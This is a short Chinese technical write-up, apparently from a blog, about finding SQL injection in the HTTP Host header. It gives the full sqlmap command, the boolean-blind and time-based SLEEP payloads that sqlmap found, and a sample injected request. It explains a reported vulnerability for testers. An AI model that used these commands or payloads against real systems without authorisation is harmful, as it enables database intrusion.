最近收到了一个漏洞通报,居然是对 HTTP 请求的 Host 参数进行 SQL 注入,比较有趣,需要总结一下。
如下是经过简化的具体的渗透测试命令,假设主机名为 aaa.bbb.ccc:
$ more sql.txt
GET / HTTP/1.1
Host: aaa.bbb.ccc*
$ sqlmap --host http://aaa.bbb.ccc -r sql.txt --random-agent -p Host --risk 3 --dbms mysql --current-user --is-dba —tables
...
sqlmap identified the following injection point(s) with a total of 306 HTTP(s) requests:
---
Parameter: Host #1* ((custom) HEADER)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: -6117') OR 9754=9754 AND ('EXWO'='EXWO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: aaa.bbb.ccc') OR SLEEP(5) AND ('UnAw'='UnAw
---
...渗透过程中 sqlmap 会生成类似如下的 HTTP 请求,以进行 SQL 注入测试,通过 -v3 参数可以看到:
GET / HTTP/1.1
Host: aaa.bbb.ccc') OR SLEEP(5) AND ('hxje'='hxje
Referer: http://aaa.bbb.ccc:80/
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8
Connection: close正常情况下,使用 --level 3 参数时 sqlmap 会测试一些 HTTP 请求头的参数,但不会测试 Host 参数,所以需要使用 -p Host 参数来指定测试。
此外由于 Host 参数与伪静态页面类似,所以还需要用 * 星号标记一下注入点。
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。